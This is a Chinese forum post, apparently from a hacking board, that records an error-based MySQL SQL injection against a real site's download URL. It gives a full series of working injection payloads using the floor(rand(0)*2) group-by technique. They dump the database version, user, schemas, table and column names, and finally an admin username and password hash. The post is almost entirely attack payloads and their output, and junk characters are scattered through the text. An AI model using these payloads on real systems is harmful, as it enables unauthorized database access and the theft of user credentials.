找回密码
 立即注册
查看: 2419|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
6 F1 r8 a* H1 E' F) [. m) @
; i* D8 z7 P! h+ r  U. M之前想找个测试 没想到这有 可以测试下做个记录而已 / D! ~: z# T' V* R7 _

9 h5 u, V8 x, j6 f& K! n  T2 Ahttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0038 ?8 v$ o. ^3 H
+ n2 w, k$ ?4 P; b( Y* l& e
/data0/htdocs/leqi_new/app/myapp.php
' v: W  y) S. Y1 z( z5 ?$ u5 c6 z$ U
或者; r$ ^% U0 n$ U7 {
" y5 D% q9 y+ a: S! D
/**********version()**********/ 5.1.49-log
; Q+ p, z1 \# q: whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003* T) R) x+ N* e. t2 h7 ^0 d

" T- I4 i% M: M$ X/**********user()**********/  3 A4 s! F* q" X1 j+ T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
  K, ^: {* v- p  l% _) f! J( x& [. T/ O; j% ?3 c5 I+ l* |
/**********database()**********/  leqi
% G. m; d+ D* Q. N* q5 q1 R$ W/ d- Mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
  T; T- Z+ \$ Q; c' J# X" X5 Q
/**********limit依次递归爆库**********/
& B1 q* o) K. s2 [. qhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! G0 g% u' T% d0 Y% {8 ^
information_schema7 C9 Z* h, c- V6 Q  o
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. B3 L4 x% X/ f% x; N4 c( p
leqi+ y( f" p* k9 k; {- H* G1 R% f
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 X6 p; F' {  [6 J
test1 Z0 V' N, t9 `; q6 l2 A: ]; j2 g, m
& S! Q' R6 ]9 I- n0 U/ r3 W
/**********limit依次递归爆表名**********/2 ]& _( B! R! e' ?+ O
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 y: F. m$ |# C0 I; Wusers
7 B' ?5 K+ e6 L% Z& I  ~: s; H# Y* Z& D* y, A
/**********limit依次递归爆字段名**********/
' c3 `0 t1 {  G( Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0039 i% k) _- s) a6 P5 ]
user_id,username,nickname,passwd,group_id* _: i9 q2 ]2 N4 A' t3 g
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23. ^  q* b1 V4 N2 {7 i
/wapc/5000_0005_003. M* }- p/ n$ D
11 213 @% \6 o1 x" c) x# [3 V
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%230 x. v/ V& ?* @% m6 R5 e
/wapc/5000_0005_003
: J# R, n. h7 j" _: J+ U9 J- w: J11 341 351 361
# H; [% H' ?! t$ {2 l, p, x4 ?, i/**********爆数据**********/
' q" J" b6 r1 f. d" J' }: Vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
0 U1 E# L) k* n# f6 jadmin; p# D( p# [- f$ U8 q% \8 d5 P; m2 |
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
0 v) F$ n  A. V# Y: K6a8b4574ca231eb8bd52764d4978ffcd% D  z: e, T' f* a5 g  R9 P

4 v3 l$ u& V! Y/ m* i
+ ?) T& n$ {/ M# s+ t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表